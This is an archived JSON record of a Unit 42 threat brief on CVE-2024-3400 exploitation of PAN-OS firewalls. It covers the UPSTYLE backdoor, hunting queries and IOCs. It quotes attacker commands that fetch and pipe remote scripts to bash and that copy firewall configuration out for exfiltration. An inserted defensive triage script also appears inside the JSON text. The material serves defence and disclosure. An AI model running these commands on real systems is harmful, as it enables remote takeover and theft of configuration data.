{
	"id": "dbb6ed94-76d8-4cf1-b6d9-b8f6dd7b36f0",
	"created_at": "2026-04-06T00:10:46.582177Z",
	"updated_at": "2026-04-10T03:37:59.062985Z",
	"deleted_at": null,
	"sha1_hash": "fa2349d8a5f0a8d211d60e45781ef4e01776981a",
	"title": "Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126467,
	"plain_text": "Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity\r\nRelated to CVE-2024-3400 (Updated May 20)\r\nBy Unit 42\r\nPublished: 2024-04-12 · Archived: 2026-04-05 14:14:42 UTC\r\nExecutive Summary\r\nThis threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is\r\nat the end of this post and offers the fullest account of all changes made.\r\nPalo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external\r\nresearchers, partners and customers to share information transparently and rapidly.\r\nA critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to\r\nexecute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of\r\n10.0.\r\nThis issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect\r\ngateway or GlobalProtect portal (or both). This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances\r\nor Prisma Access.\r\nFor up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory\r\non this issue. Additionally, episode 21 of the Unit 42 podcast Threat Vector covers the discovery, technical details and\r\nexploitation of the vulnerability.\r\nPalo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Third\r\nparties have disclosed proofs of concept for this vulnerability. We are also aware of a proof of concept including post-exploit\r\npersistence techniques that survive resets and upgrades. 
We are not aware of any malicious attempts to use these persistence\r\ntechniques in active exploitation of the vulnerability at this time.\r\nWe are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse.\r\nThe section Current Scope of the Attack includes information on the types of exploitation activity we have seen, as well as\r\ntheir relative prevalence. The vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit\r\nthe vulnerability and some compromises of PAN-OS that are limited to confirming that the device is exploitable.\r\nOther cases have included the following activity:\r\nLimited attempts in which a file on the hard drive has been copied to a location accessible via a web request\r\nA very limited number of compromises that led to interactive command execution\r\nThis threat brief will cover information about the vulnerability and what we know about post-exploitation activity. We will\r\nshare guidance to mitigate the vulnerability, though readers should also refer to the Security Advisory for specific product\r\nversion information and remediation guidance. We will continue to update this threat brief as more information becomes\r\navailable.\r\nIf you believe your firewall has been compromised, please reach out to Palo Alto Networks support.\r\nThis issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3 and all later PAN-OS\r\nversions. Hotfixes for other commonly deployed maintenance releases are also available. 
Additional guidance on mitigation\r\nfor customers is available in the Security Advisory.\r\nA Knowledge Base article, How to Remedy CVE-2024-3400, is available in the Customer Support Portal.\r\nAs a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and\r\ninvestigate any unexpected network activity.\r\nWe would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference\r\nVolexity’s blog for their analysis.\r\nPalo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways:\r\nCustomers with a Threat Prevention subscription can block attacks for this vulnerability using Threat IDs 95187, 95189 and\r\n95191 (available in Applications and Threats content version 8836-8695 and later). Our advisory has been updated with new\r\nThreat Prevention content updates that add further Threat IDs for CVE-2024-3400.\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 1 of 8\n\nTo apply the Threat IDs, customers must ensure that vulnerability protection has been applied to their GlobalProtect\r\ninterface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more\r\ninformation.\r\nThe Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this\r\nCVE.\r\nDetails of the Vulnerability\r\nA command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute\r\narbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). \r\nPalo Alto Networks is aware of targeted attacks that leverage this vulnerability. 
The next section covers details of the post-exploitation activity we’ve observed.\r\nCurrent Scope of the Attack\r\nPalo Alto Networks has classified observations of attempted exploitation into several levels, from Level 0 to Level 3. In all\r\ncases we recommend following the guidance in the Security Advisory.\r\nLevel 0: Probe – An unsuccessful exploitation attempt. Forensic artifacts indicate that the attempt was made to access the\r\ncustomer network, but the attacker did not actually succeed. Palo Alto Networks assesses there is likely little to no\r\nimmediate impact of a Level 0 attempt.\r\nLevel 1: Test – The vulnerability was being tested on the device. A 0-byte file has been created and is resident on the\r\nfirewall. However, there is no indication of any known unauthorized command execution.\r\nLevel 2: Potential Exfiltration – A file on the device has been copied to a location accessible via a web request, though the\r\nfile may or may not have been subsequently downloaded. Typically, the file we have observed being copied is\r\nrunning_config.xml.\r\nLevel 3: Interactive Access – There are signs of interactive command execution. This may include shell-based backdoors,\r\nintroduction of code, downloading files or running commands.\r\nIt is important to note that the vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to\r\nexploit the vulnerability and some Level 1 compromises of PAN-OS. Other cases have included limited Level 2 and very\r\nlimited Level 3 compromises of those targeted firewalls.\r\nUPSTYLE and Cron Job Backdoor Activity\r\nAs part of the activity observed in Operation MidnightEclipse, the threat actor exploited CVE-2024-3400 to run commands\r\non the firewall. We have determined that the threat actor initially intended to install a Python-based backdoor, which our\r\ncolleagues at Volexity referred to as UPSTYLE.\r\nWe believe the threat actors created UPSTYLE specifically for this campaign. 
However, the threat actors were unsuccessful\r\nat installing UPSTYLE after three different exploit attempts. After the third failed attempt, the threat actor decided to install\r\na cron job backdoor to carry out their post-exploitation activities.\r\nAfter failing to install UPSTYLE, the threat actor was observed exploiting CVE-2024-3400 to run a handful of\r\ncommands on the firewall. The commands included copying configuration files to the web application folder and exfiltrating\r\nthem via HTTP requests to those files.\r\nThe following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe\r\nis a VPN used by the threat actor:\r\n66.235.168[.]222\r\nAfter gathering configuration files, the threat actor exploited the vulnerability to run the following command to receive\r\nadditional commands from an external server in the form of a bash script:\r\nwget -qO- hxxp://172.233.228[.]93/patch|bash\r\nWe were unable to access the bash script hosted at this URL. However, shortly afterward we saw evidence of the creation of a\r\ncron job. This cron job would run every minute to fetch commands hosted on the same external server and execute them\r\nvia bash, as seen in the following command:\r\nwget -qO- hxxp://172.233.228[.]93/policy | bash\r\nWe were unable to access the commands served at this URL, but we believe this cron job-based backdoor was used to\r\ncarry out the actor’s post-exploitation activities.\r\nWhile the threat actors were unable to install the UPSTYLE backdoor, it appears that they created it specifically for this\r\ncampaign and planned on using it as the initial backdoor. The reasons the actors failed to install UPSTYLE included\r\nmistakes in the exploit attempts themselves, as well as trivial mistakes in the executed commands. 
While we have not seen\r\nUPSTYLE used in any other exploit attempts, it is possible that UPSTYLE could have been successfully installed on other\r\ndevices.\r\nAs previously mentioned, the threat actors made three unsuccessful exploit attempts to run commands to install\r\nUPSTYLE. For two of these attempts, UPSTYLE was hosted at hxxp://144.172.79[.]92/update.py.\r\nIn the third exploit attempt, we saw the actor hosting the backdoor at nhdata.s3-us-west-2.amazonaws[.]com, which may\r\nsuggest that the actors thought network-based protections caused the first two failed installation attempts. According to the\r\nfollowing HTTP headers, it appears that the threat actor last modified UPSTYLE hosted at 144.172.79[.]92 on April 7, 2024:\r\nAccept-Ranges: bytes\r\nContent-Length: 5187\r\nContent-Type: application/octet-stream\r\nDate: Thu, 11 Apr 2024 16:12:16 GMT\r\nEtag: \"6612443d-1443\"\r\nLast-Modified: Sun, 07 Apr 2024 06:59:09 GMT\r\nServer: nginx/1.18.0 (Ubuntu)\r\nThe update.py file hosted at 144.172.79[.]92 has the SHA256 hash\r\n3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers.\r\nFirst, update.py writes another Python script to the following location:\r\n[snip]/site-packages/system.pth\r\nThe Python script written to system.pth Base64-decodes an embedded Python script and executes it. This embedded Python\r\nscript has two functions named protect and check, which are called in that order.\r\nThe protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a\r\npersistence mechanism. The check function will read /proc/self/cmdline to see if it is running as monitor mp before running\r\nanother Base64 embedded Python script, which is the functional backdoor.\r\nThe Python script run by system.pth has a function named __main that will run in a thread. 
This function first reads the\r\ncontents of the following file, along with its access and modified times:\r\n[snip]/css/bootstrap.min.css\r\nIt then enters an infinite loop that iterates once every two seconds, reading in the following file:\r\n[snip]/sslvpn_ngx_error.log\r\nThe script will then iterate through each line of the file and search the line for the threat actor's command using the\r\nfollowing regular expression:\r\nimg\r\nIf the above regular expression matches, the script will Base64-decode the contents of the command and run it using the\r\npopen method within Python's os module. The lines of the sslvpn_ngx_error.log file that do not match the regular\r\nexpression are written back to the file, which prunes the command-bearing lines so that they do not persist in\r\nsslvpn_ngx_error.log for later analysis.\r\nAfter running the command, the script writes the output of the command to the following file:\r\n[snip]/css/bootstrap.min.css\r\nThe script will then create another thread that runs a function called restore. The restore function takes the original content\r\nof the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original\r\ncontents back to the file. It then sets the access and modified times back to their original values.\r\nThe point of this function is to avoid leaving the output of the commands available for analysis. 
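The Level 0 to Level 3 scheme this brief defines, together with the artifacts it describes (zero-byte files and copied configurations in the GlobalProtect web folder, the wget-piped-to-bash cron job, the system.pth persistence file, and the gpsvc.log grep pattern from the Security Advisory), can be turned into a host triage routine. The following is an added example written for this page, not Unit 42 code: the artifact dictionary layout, the constructed sample data, and the choice to count an outbound connection to the C2 or hosting servers as Level 3 are assumptions of the example rather than statements from the brief.

```python
# Added example (not Unit 42 code): triage host artifacts from one PAN-OS
# firewall against the observations in this brief and map them onto the
# Level 0-3 scheme from the Current Scope of the Attack section. The artifact
# dictionary layout is an assumption made for the example; on a real device the
# data would come from a tech-support file or console access.
import re

# Indicators exactly as the brief defangs them; refang() restores them for matching.
DEFANGED_IOCS = [
    '172.233.228[.]93',                    # cron job backdoor C2 (/patch, /policy)
    '144.172.79[.]92',                     # UPSTYLE hosting (update.py)
    'nhdata.s3-us-west-2.amazonaws[.]com', # UPSTYLE hosting, third attempt
]

def refang(ioc):
    '''Turn the brief notation (hxxp, [.]) back into a matchable value.'''
    return ioc.replace('[.]', '.').replace('hxxp://', 'http://')

IOCS = [refang(i) for i in DEFANGED_IOCS]

# cp [snip]/running-config.xml [snip]/global-protect/[16 random characters].css
RANDOM_CSS = re.compile(r'^[A-Za-z0-9]{16}[.]css$')

LEVEL_NAMES = {
    -1: 'no findings',
    0: 'Level 0: Probe',
    1: 'Level 1: Test',
    2: 'Level 2: Potential Exfiltration',
    3: 'Level 3: Interactive Access',
}

def triage(artifacts):
    '''Return (highest_level, findings) for one device.

    Assumed artifact keys (each optional):
      gpsvc  - lines from mp-log gpsvc.log*
      webdir - (path, size_bytes, first_line) tuples from the global-protect web folder
      cron   - crontab lines for root
      pth    - .pth file names found under site-packages
      conns  - outbound destination hosts seen from the management plane
    '''
    findings = []
    level = -1

    def hit(n, what):
        nonlocal level
        level = max(level, n)
        findings.append((n, what))

    # Level 0: the advisory grep pattern shows that an attempt reached the device.
    for line in artifacts.get('gpsvc', []):
        if 'failed to unmarshal session' in line:
            hit(0, 'gpsvc.log: ' + line.strip())

    for path, size, first_line in artifacts.get('webdir', []):
        base = path.rsplit('/', 1)[-1]
        # Level 1: touch-created 0-byte marker such as index.css or test.min.css.
        if size == 0:
            hit(1, 'zero-byte file in web folder: ' + path)
        # Level 2: running configuration copied where a web request can fetch it.
        elif first_line.lstrip().startswith('<config') or RANDOM_CSS.match(base):
            hit(2, 'possible running-config copy in web folder: ' + path)

    # Level 3: cron job backdoor (wget ... | bash) or UPSTYLE persistence file.
    for line in artifacts.get('cron', []):
        if '|bash' in line.replace(' ', '') or any(i in line for i in IOCS):
            hit(3, 'suspicious cron entry: ' + line.strip())
    for name in artifacts.get('pth', []):
        if name == 'system.pth':
            hit(3, 'UPSTYLE persistence file: site-packages/' + name)
    # Counting an outbound hit on the hosting or C2 servers as Level 3 is this
    # example's assumption: the firewall itself had to run wget to reach them.
    for host in artifacts.get('conns', []):
        if host in IOCS:
            hit(3, 'outbound connection to indicator: ' + host)

    return level, findings

# Constructed sample, built only from the brief's defanged indicators and the
# commands it quotes; this is not data from any real device.
SAMPLE = {
    'gpsvc': ['Apr 11 16:12:16 gpsvc: failed to unmarshal session(constructed)'],
    'webdir': [
        ('index.css', 0, ''),
        ('portal/css/test.min.css', 0, ''),
        ('Ab3dEfGh1jKlMnOp.css', 48213, '<config>'),
    ],
    'cron': ['* * * * * wget -qO- http://' + IOCS[0] + '/policy | bash'],
    'pth': ['system.pth'],
    'conns': [IOCS[0], 'updates.paloaltonetworks.com'],
}

if __name__ == '__main__':
    level, findings = triage(SAMPLE)
    print(LEVEL_NAMES[level])
    for n, what in sorted(findings):
        print(LEVEL_NAMES[n], '-', what)
```

The routine reports the highest level reached and every supporting finding, so a device that only shows the gpsvc.log pattern stays at Level 0 while one with a cron entry or system.pth is escalated regardless of what else is present; the IOC list and regular expressions should be extended from the Security Advisory as it is updated.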
Also, this suggests that the\r\nthreat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before\r\nthe backdoor overwrites the file.\r\nThe use of legitimate log files to receive commands and a legitimate CSS file to exfiltrate the command results suggests that\r\nthe threat actors developed this backdoor specifically to run on a compromised firewall.\r\nGuidance\r\nWe strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when\r\nworkarounds and mitigations have been applied.\r\nThis issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS\r\nversions. \r\nPlease see the frequently updated Palo Alto Networks Security Advisory on CVE-2024-3400 for information on hotfixes and\r\nthe most current guidance for mitigating this vulnerability. A Knowledge Base article, How to Remedy CVE-2024-3400, is\r\navailable in the Customer Support Portal.\r\nIn earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device\r\ntelemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for PAN-OS firewalls to be\r\nexposed to attacks related to this vulnerability.\r\nUnit 42 Managed Threat Hunting Queries\r\nThe Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using\r\nCortex XDR and the XQL queries below. 
Cortex XDR customers can also use these XQL queries to search for signs of\r\nexploitation.\r\n// Description: Search for domain IOC in raw NGFW logs\r\ndataset = panw_ngfw_url_raw\r\n| filter url_domain ~= \".*nhdata.s3-us-west-2.amazonaws.com\"\r\n| fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip,\r\ndest_port, protocol, rule_matched, rule_matched_uuid\r\n// Description: Detect hits for the specific prevention signature for CVE-2024-3400\r\nconfig case_sensitive = false\r\n| dataset = panw_ngfw_threat_raw\r\n| filter threat_id in (95187,95189,95191)\r\n| fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip,\r\nsource_port, dest_ip, dest_port, *\r\n// Description: Hits for known IOCs in NGFW traffic\r\nconfig case_sensitive = false\r\n| dataset = panw_ngfw_traffic_raw\r\n| filter source_ip in\r\n(\"110.47.250.103\",\"126.227.76.24\",\"38.207.148.123\",\"147.45.70.100\",\"199.119.206.28\",\"38.181.70.3\",\"149.28.194.95\",\"78.141.232.174\",\"38.180.\r\nor dest_ip in\r\n(\"110.47.250.103\",\"126.227.76.24\",\"38.207.148.123\",\"147.45.70.100\",\"199.119.206.28\",\"38.181.70.3\",\"149.28.194.95\",\"78.141.232.174\",\"38.180.\r\n| fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, proto\r\n// Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW)\r\nconfig case_sensitive = false\r\n| dataset = xdr_data \r\n| filter event_type = ENUM.STORY\r\n| filter dst_action_external_hostname ~=\".*nhdata.s3-us-west-2.amazonaws.com\" OR\r\ndns_query_name ~=\".*nhdata.s3-us-west-2.amazonaws.com\" OR\r\naction_external_hostname ~=\".*nhdata.s3-us-west-2.amazonaws.com\" OR\r\naction_remote_ip 
in\r\n(\"110.47.250.103\",\"126.227.76.24\",\"38.207.148.123\",\"147.45.70.100\",\"199.119.206.28\",\"38.181.70.3\",\"149.28.194.95\",\"78.141.232.174\",\"38.180.\r\n| fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_extern\r\nAdditional Exploitation Observations\r\nWhile continuing to monitor exploitation efforts, we have observed additional IP addresses attempting to exploit CVE-2024-3400 based\r\non our Threat Prevention signature with Threat ID 95187.\r\nWe have not seen any relationships between these indicators and those associated with Operation MidnightEclipse. We have\r\ngrouped the Operation MidnightEclipse indicators exclusively with the activity involving exploitation of the zero-day vulnerability and the\r\nUPSTYLE backdoor.\r\nAs of writing this update, the following IP addresses have triggered the threat prevention signature:\r\n110.47.250[.]103\r\n126.227.76[.]24\r\n38.207.148[.]123\r\n147.45.70[.]100\r\n199.119.206[.]28\r\n38.181.70[.]3\r\n149.28.194[.]95\r\n78.141.232[.]174\r\n38.180.128[.]159\r\n64.176.226[.]203\r\n38.180.106[.]167\r\n173.255.223[.]159\r\n38.60.218[.]153\r\n185.108.105[.]110\r\n146.70.192[.]174\r\n149.88.27[.]212\r\n154.223.16[.]34\r\n38.180.41[.]251\r\n203.160.86[.]91\r\n45.121.51[.]2\r\nFrom our analysis, we do not see any additional activity from these IP addresses beyond probing the vulnerability to\r\ndetermine whether the firewall is vulnerable or already compromised. We have seen the following commands within the exploit\r\nattempts that the threat prevention signature is blocking:\r\ntouch [snip]/global-protect/index.css\r\ntouch [snip]/global-protect/portal/css/test.min.css\r\ncp [snip]/running-config.xml [snip]/global-protect/[16 random characters].css\r\nThe commands above show two examples of the use of the touch command to create an empty file in the web application\r\nfolder. 
The client would then attempt to access this file via an HTTP request to determine if exploitation was successful. The\r\nthird command shows a bit more malicious behavior, which involves copying the running configuration to the web\r\napplication folder for access.\r\nWe have also seen probing attempts that use either wget or curl to reach remote servers; the external party uses the resulting\r\noutbound HTTP request to confirm successful exploitation and command execution:\r\nwget srgsd1f.842b727ba4.ipv6.1433.eu[.]org\r\nwget edcjn.57fe6f5d9d.ipv6.1433.eu[.]org\r\ncurl srgsdf.842b727ba4.ipv6.1433.eu[.]org\r\nwget --no-check-certificate https://45.121.51[.]2/abc.txt\r\nConclusion\r\nThe Security Advisory will continue to provide up-to-date information on impacts to Palo Alto Networks products and\r\nrecommended mitigations. We will continue to update this threat brief with information on exploitation.\r\nAgain, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and\r\npartnership. Please reference Volexity's blog for their analysis.\r\nPalo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this\r\nintelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. 
Learn more\r\nabout the Cyber Threat Alliance.\r\nProtections and mitigations for the observed exploitation activity are below and will be updated as more become available.\r\nPalo Alto Networks Product Protections for CVE-2024-3400\r\nPalo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this\r\nthreat.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with Palo Alto Networks support.\r\nNext-Generation Firewalls and Prisma Access With Advanced Threat Prevention\r\nNext-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signatures 95187, 95189 and 95191.\r\nCortex XDR, XSIAM and the Unified Cloud Agent \r\nCortex XDR and XSIAM agents and analytics help protect and detect against post-exploitation activity if an attacker tries to\r\nenumerate or laterally move to other assets.\r\nCortex Xpanse and XSIAM ASM Module\r\nCortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and\r\nescalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks\r\nGlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in\r\nthe incident view of Expander. 
These findings are also available for Cortex XSIAM customers who have purchased the ASM\r\nmodule.\r\nIndicators of Compromise\r\nUPSTYLE Backdoor\r\n3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\r\n5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078\r\nCommand and Control Infrastructure\r\n172.233.228[.]93\r\nhxxp://172.233.228[.]93/policy\r\nhxxp://172.233.228[.]93/patch\r\n66.235.168[.]222\r\nHosted Python Backdoor\r\n144.172.79[.]92\r\nnhdata.s3-us-west-2.amazonaws[.]com\r\nObserved Commands\r\nwget -qO- hxxp://172.233.228[.]93/patch|bash\r\nwget -qO- hxxp://172.233.228[.]93/policy | bash\r\n\"failed to unmarshal session(.\\+.\\/\" mp-log gpsvc.log* (Please see our Security Advisory for further information on\r\nthis command.)\r\nAdditional Resources\r\nUnderstanding the Midnight Eclipse Activity and CVE 2024-3400 – Unit 42 Threat Vector podcast, Episode 21, Palo\r\nAlto Networks\r\nHow to Remedy CVE-2024-3400 – Knowledge Base, Palo Alto Networks Customer Support Portal\r\nMore on the PAN-OS CVE-2024-3400 – Palo Alto Networks Blog\r\nCVE-2024-3400 PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect –\r\nPalo Alto Networks\r\nZero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)\r\n– Volexity\r\nPalo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400 – Cybersecurity and\r\nInfrastructure Security Agency (CISA)\r\nUpdate Log\r\nUpdated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional\r\nResources.\r\nUpdated April 12, 2024, at 12:45 a.m. PT to add Cortex Xpanse product protections.\r\nUpdated April 14, 2024, at 11:05 a.m. PT to clarify impact on GlobalProtect portal configurations.\r\nUpdated April 14, 2024, at 7:55 p.m. 
PT to reflect that hotfixes are in place and ETAs added in our Security Advisory\r\nfor upcoming hotfixes.\r\nUpdated April 15, 2024, at 8:35 a.m. PT to update exploitation activity in Executive Summary.\r\nUpdated April 15, 2024, at 9:16 a.m. PT to update language on Threat ID 95187 in the Executive Summary, including\r\ninformation on firewalls managed by Panorama.\r\nUpdated April 16, 2024, at 7:45 a.m. PT to add Additional Exploitation Observations section with IoCs and\r\ncommands.\r\nUpdated April 16, 2024, at 9:48 a.m. PT to remove update.py filename from list of indicators.\r\nUpdated April 16, 2024, at 2:00 p.m. PT to update the Executive Summary and Mitigations section to add new\r\nmitigation guidance, a new Threat Prevention signature and availability of PAN-OS fixes.\r\nUpdated April 16, 2024, at 2:40 p.m. PT to align the Executive Summary and Details of the Vulnerability sections\r\nmore closely to the Security Advisory.\r\nUpdated April 17, 2024, at 6:15 a.m. PT to add Threat ID 95191.\r\nUpdated April 17, 2024, at 11:30 a.m. PT to add an additional bullet to the Observed Commands subsection.\r\nUpdated April 17, 2024, at 12:23 p.m. PT to clarify contact information.\r\nUpdated April 19, 2024, at 12:45 p.m. PT to heavily revise the Current Scope of Attack section as well as the section on\r\nOperation MidnightEclipse activity (UPSTYLE and Cron Job Backdoor Activity).\r\nUpdated April 22, 2024, at 3:15 p.m. PT to more thoroughly define the levels of activity seen in the Current Scope of\r\nthe Attack section.\r\nUpdated April 23, 2024, at 7:40 a.m. PT to add language to recommendations for Level 2 and Level 3 in Scope of\r\nAttack section. Clarified language in Guidance section. Added Update Log section.\r\nUpdated April 24, 2024, at 7:10 a.m. PT to include a link to a Customer Support Portal Knowledge Base article.\r\nUpdated April 24, 2024, at 6:15 p.m. 
PT to include updated XQL queries for hits for known IoCs in NGFW traffic\r\nand in XDR telemetry and NGFW telemetry.\r\nUpdated April 25, 2024, at 8:00 a.m. PT to add Knowledge Base article to Additional Resources.\r\nUpdated April 26, 2024, at 12:22 p.m. PT for clarity and consistency.\r\nUpdated April 29, 2024, at 6:52 a.m. to add Unit 42 Threat Vector podcast on the vulnerability to Additional\r\nResources.\r\nUpdated April 29, 2024, at 11:55 a.m. PT to update exploitation status about proof of concept by third parties of post-exploit persistence techniques.\r\nUpdated May 1, 2024, at 8:05 a.m. PT for clarity and consistency.\r\nUpdated May 3, 2024, at 7:25 a.m. PT to note additional mitigation information for customers was added to the\r\nSecurity Advisory.\r\nUpdated May 20, 2024, at 8:10 a.m. PT to adjust second threat hunting query.\r\nSource: https://unit42.paloaltonetworks.com/cve-2024-3400/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2024-3400/"
	],
	"report_names": [
		"cve-2024-3400"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "63883709-27b5-4b65-9aac-c782780fbb28",
			"created_at": "2026-04-10T02:00:03.996704Z",
			"updated_at": "2026-04-10T02:00:03.996704Z",
			"deleted_at": null,
			"main_name": "TeamPCP",
			"aliases": [],
			"source_name": "MISPGALAXY:TeamPCP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434246,
	"ts_updated_at": 1775792279,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa2349d8a5f0a8d211d60e45781ef4e01776981a.pdf",
		"text": "https://archive.orkl.eu/fa2349d8a5f0a8d211d60e45781ef4e01776981a.txt",
		"img": "https://archive.orkl.eu/fa2349d8a5f0a8d211d60e45781ef4e01776981a.jpg"
	}
}